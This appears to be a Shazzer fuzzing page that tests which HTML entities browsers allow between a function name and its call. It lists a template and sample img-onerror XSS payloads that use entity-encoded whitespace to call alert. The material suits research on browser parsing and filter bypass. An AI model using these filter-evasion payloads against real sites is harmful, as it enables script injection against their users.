Entities allowed between function calls

This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Saturday, June 29, 2024 at 1:55:26 PM

Updated on: Tuesday, May 27, 2025 at 8:16:09 AM

Category: Entity Parsing

Vector visibility: Public

Vector type: XSS

Vector charset: UTF-8

Vector data 1: html_entities

Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert&puncsp;('&puncsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert&hairsp;('&hairsp;')"><img src=data: onerror="alert&emsp;('&emsp;')"><img src=data: onerror="alert&NonBreakingSpace;('&NonBreakingSpace;')"><img src=data: onerror="alert&NewLine;('&NewLine;')"><img src=data: onerror="alert&emsp13;('&emsp13;')"><img src=data: onerror="alert&emsp14;('&emsp14;')"><img src=data: onerror="alert&ensp;('&ensp;')"><img src=data: onerror="alert&Tab;('&Tab;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert&numsp;('&numsp;')"><img src=data: onerror="alert&VeryThinSpace;('&VeryThinSpace;')"><img src=data: onerror="alert ('&ThickSpace;')">

Entities allowed between function calls

Sample payloads

Fuzz results